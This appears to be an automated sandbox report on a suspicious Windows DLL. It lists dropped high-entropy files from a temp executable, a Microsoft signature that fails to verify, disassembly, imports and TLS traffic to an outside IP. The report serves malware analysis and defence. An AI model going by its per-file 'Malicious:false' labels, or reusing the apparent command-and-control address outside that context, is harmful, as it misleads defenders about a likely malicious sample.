                                                                                            Malicious:false
                                                                                            Preview:pc..%ab4....6_b..$...."....(*......oq..%.....d>W'U.3..D.M.........I. ...h..x\...'O..7f.<....z..]Q.....F.6.o......C.l_2Z..Y.......&...~.6...m.+D4.H.jB.x.....E....BLRGl.!e.OwH?...D;D.m.fe...........PB.0N..[+......M...L.Pn..}g....qy..E....yM0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.157135362351111
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:dDOfPpSjH8wCRXlk1cN9QV6DofmN3IMhxYczCXoMTniHn:dDOfRU8w3cX0uN3IMhqczwRniHn
                                                                                            MD5:2AF25F7A81CDBAFED59A2A3F4E82E66A
                                                                                            SHA1:CE1ED21D8380DDA51DBEDD66ADE4D7CCCBEBD13D
                                                                                            SHA-256:7D331E005BE35B0ED76C22A65F5A00CF93A5CCBEF24BFAACC6B7F1D229738927
                                                                                            SHA-512:DE23A9C14595B868F63A977334A37D46AD0A38BF6F241940A5821E25958846BE5950CC4552846EF4E1F5BBAAF142B44606E70A48C62218A253BED7931E15ED9D
                                                                                            Malicious:false
                                                                                            Preview:...'.&\.x.k!.:..H+D.....7A.0....d...a.....0.rn4B9.....G4..+.0.zR....~.S...A.NY.."..oV'.s...}..Y...'Vw.*....U.u.!...B.Q>.:0...=.7...1.h.y(..\L....E.s8.....;....R..|d..J .M..D.GZ.....-.:p.b......O\M.S.H9.4...R.:2b....=....B.....X...\...M6.q<z.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.178746662959585
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:6aAIO+lcDeJy9nfO3sB1ottKtBFM6j0hnQG0384DMkHn:VfflyeJmW3DnMBBJ38dkHn
                                                                                            MD5:C8C90BD1F568E53E38F8764F4E4269E9
                                                                                            SHA1:C7F3180F36349177FD9CB3771E7129F943EA6606
                                                                                            SHA-256:73B99AF3C4F7301E1033D1361C72ECBAF02334D2BFAC967AA8343CB6E33DD733
                                                                                            SHA-512:AFBB3A30FE3A8CD3F99DEDF262F48A9562001A278C21DB80E8974FFB63AB97140F9A8853CDC716044B57638ED4EE60447000648362EB8478878A8983BB1884E3
                                                                                            Malicious:false
                                                                                            Preview:+0...d.fxl...`..z@6.....?UI.-?...O.......R.OEQe..-..,....FYK......1......V,.e.o.o.."P..&.I.s.-YH..N.n..g...;.}5.Y......S..`..]..H........w....JO.K..+..>.2...*=.q9..Y.&.mJP.h........F...Nmi.\....w..v.-....U...{nl....95:1.O.R..T.......2t.z.%.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.209669830212152
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:IL/W5miw55o65D/BQnsuuswCOfZqud1y+oMqWUSnHn:ILnJXo6YBuskly+oztMn
                                                                                            MD5:D9DC814C072716B070C02FFE284F71B0
                                                                                            SHA1:E82DFF60D76FB806D254EEC7E3BB93B833882811
                                                                                            SHA-256:B8B168D0F1A061AF23A8A2E6696FE9A22B62812EB517349DE1EE85105EED24BF
                                                                                            SHA-512:8818834F48A954CE044BF02AACF110972F745C6479EB4C0FEB8BBB6248AB6BC42E292AB235CA3E1428E071B0C642341A6BC7B2526BA703DFE29B815CF711B292
                                                                                            Malicious:false
                                                                                            Preview:(.@,....y.}..4.p.qPf.P...!..:...m.....W..I.(.W..%.8..<.y...@.)...L(.._........}..).2.YM..Ov.iNk......I0. ....`.D0....K..K...d.uu.....3j*z....W.L....ji...........%E#..{.}./T=..x.v.v.5.#.$a!J...s..B.R.0.GV.._Z............S...c..h.1...............0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.224331990098961
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:0tu/CidICGXKBktBR69VndOmt1kAspk9u2xbwGKqNsFnpn:D6id1G6Wud91kJkuxdqMn
                                                                                            MD5:A28D95F9F41A29E928DF1CE7D62CF901
                                                                                            SHA1:12A8E286E3CBBCAE5DD3F6D6A255442C20D08E5C
                                                                                            SHA-256:13020F368CA9A5F9F9D25E82B8B62BB9D8DCD7AD793631E4A4C3D79C715953A2
                                                                                            SHA-512:6AE15B465DD9708BD8309DBD5DE180863F9AFDF3E12A9376CCF410EEE7DB0F30CB60999D0AF8B693269E1DE4AD9EED826092C263757795F496B7A8D2BB3BE336
                                                                                            Malicious:false
                                                                                            Preview:@....2.+$. !....BW.b.{..^..X.m...l..Q.....q..x..U.j..".$v..aG.E.;"..'..y..(P......-..E.J~..WBF.?......=....|...t.U.>.:.:...K.......`.......D.D..._,.......{H/.799.J.O.J.O.q^.5..v.5OBrNK..~F,..o..........l...XN..o8MN,P..>Z.%....`E.o......\..C=*..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.2984278771085345
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:VJ1zPE4rL4HbtH6t/RwN6PadAowwmNyire4Qa2n:V/zlLG6tS6Cmj6e2n
                                                                                            MD5:8B20D78EFF28086A7609DED167B9FFE9
                                                                                            SHA1:8A3BA70B127D89840BB555F7025E5A69FE0E7C8E
                                                                                            SHA-256:48C9C0FD9672E08396798E51A6AADB5977F97B902700A01CCC26ACD7CE514279
                                                                                            SHA-512:6F28E47DF3E5CBAA24BCD42C948B8F9ACA59B3B13AE7A53148A5A0F545F108BF037DD9E1944522AB3EFF36CE7BA5FEE5AABF998AB0E974EBEB8B235274872E35
                                                                                            Malicious:false
                                                                                            Preview:5.........tc^..7..3.MjL...h..#.......{wk..._v.s..+...," .e|..N$...f.....z.. .$X.0k.5...x.x...Y.+.M.z.G...>.S"&........9Y./.........N}j......cw...\=&...\..T;G.9..Zp7.iU7.k).?...Q..Lg...q.%C._~i.@..../.q.%+....$Z..Qd..?1..xZ0......6..`.._...0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.244425892234097
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:ljQaSIXimmGvuuz5noVJ5YAgoUEd1bln0/5ydqxNXvS/ZYuiELARxmn:J8KhzoJqFI150xyZuuFkxmn
                                                                                            MD5:4E17E683843FA0E6955DA4724D6384C1
                                                                                            SHA1:7F8492088B97C4CDD7B2B29FEA46F3C1B9B7D3E2
                                                                                            SHA-256:14FDD1846C88594B37FDE01EC4FE392620113541785145BCED5AD4B760E9049A
                                                                                            SHA-512:121C369C89A7081F9283C43A418358745A14FC8125BB2AEFCF1F7B9EB1E3FEC1771150C193AF87F480F983C8B26483A1391EC95EA3B9A97D5A16C1CE42783C44
                                                                                            Malicious:false
                                                                                            Preview:.....X..u.........m.~..Z&)..Q:.3.TU...]PH....m..Z=...K8....~..3.0..=.N.8....k...v..r@o.vaWX.U....1N.......'...}62:N./..X[.......5.hqt...&..Q.p..j.S..)f]..gO..%..e,.....Z\'V_*.W;.....T..Y..8.Zo.?D.&a..Z...c...-.yw.....c.=..>....h.......y=..G.(40xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.1540533357780465
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:0ZzP7wGRtxJdyQyK6Crwjmi+9reEtzZBxIYs51mbqAL0p1ARnn:0NP7TJUqDrwj4rRnAmzMKJn
                                                                                            MD5:EB1E9D8A9FC806EF4C9B4E83B7C44695
                                                                                            SHA1:53B3DAB99B2138A51D5BBDF416A9A92876DF16DC
                                                                                            SHA-256:516061E4D95BC6CFFA3E8D8956884626813EB751AF3403CE2D7EE75964763B3B
                                                                                            SHA-512:7F65A3E5679F78616C1DE1ACE07B0BA9BEEF019976B86EA4A2D698F1A053049B883D8F6892F0937AFEAEF68AA556A021BEA5A37B6836FD0AD7A50319EDC825DA
                                                                                            Malicious:false
                                                                                            Preview:..M......4S......P.%.A....X..pR.....K..%..^M.J..7..9Z....K7S.).w9W.+.<.......h..q..X...ZV...i..2=.&..'...oK..!...-ZN9..!.E...).~wt..pG.y6.&.D2..v.;.9..f...:...d.....{......W....wCK....1........`W.vP(.=......[...U.C...d.....qX.x.%.......0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):286
                                                                                            Entropy (8bit):7.220471719644148
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:CxVEyTs7vxrOAuTcPjjgXElwZdC4KtabfSya2qCN8caNjetN/EjbbzlJn:gaewOAec7kewhKtIau8PjetNsjrlJn
                                                                                            MD5:F873F118060580FE550D4EDBE301DAB9
                                                                                            SHA1:B84BEDEF5FA7AF29282341CCD38A3053B9FA7A23
                                                                                            SHA-256:AFB3045D3D94D93940D66565E07E0B14ABDD4695A5A1C24FE4437F44153DB073
                                                                                            SHA-512:9224C5260B5D4D5A186ABAF2303FCA2C013E200896A4DF19283B6EAF35D9FDEECF582F5640E0B133B36165D03482BC04C1BBDAF13F45B1705AB25A45C605C5C4
                                                                                            Malicious:false
                                                                                            Preview:..h.....5. .NDO$...........=...).2...#..W. .O.-.a....2..V^2........"..z..=.z..b..../eh...C......n.{....v.BNk.E../.>.H....M.......\.(..F..n..t....-.{.my..6.#....p.v....K.L<..y.....np.Y|!.....d".k..j.CBD:9VS..a.c..K.....$..b*....i.\..e..~>|hL.O..%;..x.Y....t....Tn~..W0xABADCABA
                                                                                            Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):48
                                                                                            Entropy (8bit):4.305255793112395
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:8yzGc7C1RREal:nzGtRV
                                                                                            MD5:6ED2062D4FB53D847335AE403B23BE62
                                                                                            SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                                                                                            SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                                                                                            SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                                                                                            Malicious:false
                                                                                            Preview:ERROR:...Description = Initialization failure...
                                                                                            Process:C:\Windows\SysWOW64\PING.EXE
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):283
                                                                                            Entropy (8bit):4.84674468132717
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:PzXULmWxHLTpUrU4wUsW3CNcwAFeMmvVOIHJFxMVlmJHaVFrIW1IrIW83Wy:P+pTpcU4nsTDAFSkIrxMVlmJHaVtr1eq
                                                                                            MD5:38A6ED2824540859D2923148B0B1E0E1
                                                                                            SHA1:3F99ADE9E9E545F56766083B437D956C4557D3A2
                                                                                            SHA-256:CCB4CA9180D0A3BA685602EC69270BAD1C98D87C8D6D949AC4BE95FF719DA7B7
                                                                                            SHA-512:C8B8BB9366862459513610A3E4EABA0DF37E1390ED47AAF92BBCB1375C92AFCA0E8A16423F953B53B25F4A533AFE569E0ACA77D2F57777D3BCAC44D15C70A7E7
                                                                                            Malicious:false
                                                                                            Preview:..Pinging 1.1.1.1 with 32 bytes of data:..Reply from 1.1.1.1: bytes=32 time=136ms TTL=55....Ping statistics for 1.1.1.1:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 136ms, Maximum = 136ms, Average = 136ms..
                                                                                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):6.762236890239743
                                                                                            TrID:
                                                                                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                            • DOS Executable Generic (2002/1) 0.20%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:R7bv9d6gTH.dll
                                                                                            File size:227'264 bytes
                                                                                            MD5:a99d226d4adb07e5b2199a45775b4d7f
                                                                                            SHA1:de70709475a627269d7838c9fb8121c7d773c106
                                                                                            SHA256:24152c92202a5618f5bbbc385e84c81974e199245c1dd0c5ea680e0b3cf6dcb7
                                                                                            SHA512:635bd483bb650c85fbf2d30b900884dd037cfa36a1e7eac1bf41d512b3200367a97baec38e3ce12d9e821ebe14f02b71913c661f1d8eb186d9ba8f47d31b828d
                                                                                            SSDEEP:3072:vmFV9d9YLv8Zw8OA+7TZWxCbJkjWlB0jqCxRN1XlsiZ6YOZb5ToOAg0Fuj0B/I4P:vmVXPBATZXt8W41Vsb55HAOQI4+cr6m
                                                                                            TLSH:17248C407092C073EABE15304478DAA65E3EB9610BA0D9EB67D8AD7D4F313C19734A7A
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...B...*...B..J*...B...*..._...*..._...*..._...*...B...*...*...*.."_...*.."_"..*.."_...*..Rich.*.................
                                                                                            Icon Hash:7ae282899bbab082
                                                                                            Entrypoint:0x10007e76
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x10000000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                            Time Stamp:0x674AC56E [Sat Nov 30 07:57:34 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:6
                                                                                            OS Version Minor:0
                                                                                            File Version Major:6
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:6
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:4296af526a0727355d9beaac8837948f
                                                                                            Signature Valid:false
                                                                                            Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                            Error Number:-2146869232
                                                                                            Not Before, Not After
                                                                                            • 22/08/2024 21:25:57 05/07/2025 21:25:57
                                                                                            Subject Chain
                                                                                            • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                            Version:3
                                                                                            Thumbprint MD5:BB60DC2DCCA0C553168F41C88E7C1F49
                                                                                            Thumbprint SHA-1:7920AC8FB05E0FFFE21E8FF4B4F03093BA6AC16E
                                                                                            Thumbprint SHA-256:60B9838C9BBFE3F6A754CE52E15513D983DC34F4A9695E15A4DA8130CC556295
                                                                                            Serial:33000005A7B88FFB975D3584EC0000000005A7
                                                                                            Instruction
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            cmp dword ptr [ebp+0Ch], 01h
                                                                                            jne 00007F67A4ED13B7h
                                                                                            call 00007F67A4ED1B10h
                                                                                            push dword ptr [ebp+10h]
                                                                                            push dword ptr [ebp+0Ch]
                                                                                            push dword ptr [ebp+08h]
                                                                                            call 00007F67A4ED1263h
                                                                                            add esp, 0Ch
                                                                                            pop ebp
                                                                                            retn 000Ch
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push esi
                                                                                            mov eax, dword ptr [esp+14h]
                                                                                            or eax, eax
                                                                                            jne 00007F67A4ED13DAh
                                                                                            mov ecx, dword ptr [esp+10h]
                                                                                            mov eax, dword ptr [esp+0Ch]
                                                                                            xor edx, edx
                                                                                            div ecx
                                                                                            mov ebx, eax
                                                                                            mov eax, dword ptr [esp+08h]
                                                                                            div ecx
                                                                                            mov esi, eax
                                                                                            mov eax, ebx
                                                                                            mul dword ptr [esp+10h]
                                                                                            mov ecx, eax
                                                                                            mov eax, esi
                                                                                            mul dword ptr [esp+10h]
                                                                                            add edx, ecx
                                                                                            jmp 00007F67A4ED13F9h
                                                                                            mov ecx, eax
                                                                                            mov ebx, dword ptr [esp+10h]
                                                                                            mov edx, dword ptr [esp+0Ch]
                                                                                            mov eax, dword ptr [esp+08h]
                                                                                            shr ecx, 1
                                                                                            rcr ebx, 1
                                                                                            shr edx, 1
                                                                                            rcr eax, 1
                                                                                            or ecx, ecx
                                                                                            jne 00007F67A4ED13A6h
                                                                                            div ebx
                                                                                            mov esi, eax
                                                                                            mul dword ptr [esp+14h]
                                                                                            mov ecx, eax
                                                                                            mov eax, dword ptr [esp+10h]
                                                                                            mul esi
                                                                                            add edx, ecx
                                                                                            jc 00007F67A4ED13C0h
                                                                                            cmp edx, dword ptr [esp+0Ch]
                                                                                            jnbe 00007F67A4ED13BAh
                                                                                            jc 00007F67A4ED13C1h
                                                                                            cmp eax, dword ptr [esp+08h]
                                                                                            jbe 00007F67A4ED13BBh
                                                                                            dec esi
                                                                                            sub eax, dword ptr [esp+10h]
                                                                                            sbb edx, dword ptr [esp+14h]
                                                                                            xor ebx, ebx
                                                                                            sub eax, dword ptr [esp+08h]
                                                                                            sbb edx, dword ptr [esp+0Ch]
                                                                                            neg edx
                                                                                            neg eax
                                                                                            sbb edx, 00000000h
                                                                                            mov ecx, edx
                                                                                            mov edx, ebx
                                                                                            mov ebx, ecx
                                                                                            mov ecx, eax
                                                                                            mov eax, esi
                                                                                            pop esi
                                                                                            retn 0010h
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                            push esi
                                                                                            mov ecx, dword ptr [eax+00h]
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2f7580x28.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x320000xf8.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x322000x55c0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x330000x1cd0.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x2d7d00x70.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d8400x40.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x220000x13c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x20f330x21000fa1c83a3b26af2e5e8dc2e6f10444660False0.574951171875data6.655108786407723IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x220000xde6e0xe000b20389349d4b7436c7f1d46ea25af754False0.5153982979910714data5.614413716155776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x300000x1d280xe00718930fdba242320c597ccdd316fdbecFalse0.21344866071428573DOS executable (block device driver @\273\,32-bit sector-support)3.3942982059834934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x320000xf80x20044dc3cc34089e9312c8dbdeaae6caa0dFalse0.3359375data2.5236806502270213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x330000x1cd00x1e004955f6dbfb9ee9ecf49e46124940452aFalse0.72578125data6.495234194643975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_MANIFEST0x320600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793
                                                                                            DLLImport
                                                                                            KERNEL32.dllCreateProcessW, GetLastError, WaitForSingleObject, CloseHandle, Sleep, WriteConsoleW, QueryPerformanceCounter, QueryPerformanceFrequency, WideCharToMultiByte, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedFlushSList, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapFree, HeapAlloc, GetStdHandle, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, SetStdHandle, HeapSize, CreateFileW
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 5, 2024 05:26:15.435493946 CET49734443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:15.435530901 CET44349734103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:15.435599089 CET49734443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:15.435720921 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:15.435785055 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:15.435909986 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:15.444917917 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:15.444937944 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:15.444938898 CET49734443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:15.444953918 CET44349734103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:17.085505962 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:17.085861921 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:17.090801001 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:17.090815067 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:17.091250896 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:17.101844072 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:17.147334099 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:17.269346952 CET44349734103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:17.269484997 CET49734443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:17.270983934 CET49734443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:17.270991087 CET44349734103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:17.271274090 CET44349734103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:17.279216051 CET49734443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:17.323328972 CET44349734103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.047179937 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.047207117 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.047221899 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.047281027 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.047322035 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.047370911 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.090465069 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.090493917 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.090540886 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.090564966 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.090579987 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.131954908 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.217058897 CET44349734103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.217088938 CET44349734103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.217103958 CET44349734103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.217155933 CET49734443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.217175007 CET44349734103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.217231989 CET49734443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.221288919 CET49734443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.261936903 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.261975050 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.262078047 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.262109041 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.262588978 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.291493893 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.291522980 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.291569948 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.291589975 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.291614056 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.291630030 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.325450897 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.325475931 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.325519085 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.325530052 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.325562954 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.325586081 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.357112885 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.357135057 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.357182980 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.357197046 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.357223034 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.357237101 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.477859020 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.477885962 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.477932930 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.477968931 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.477986097 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.478017092 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.500219107 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.500243902 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.500287056 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.500313044 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.500324965 CET49735443192.168.2.6103.253.43.248
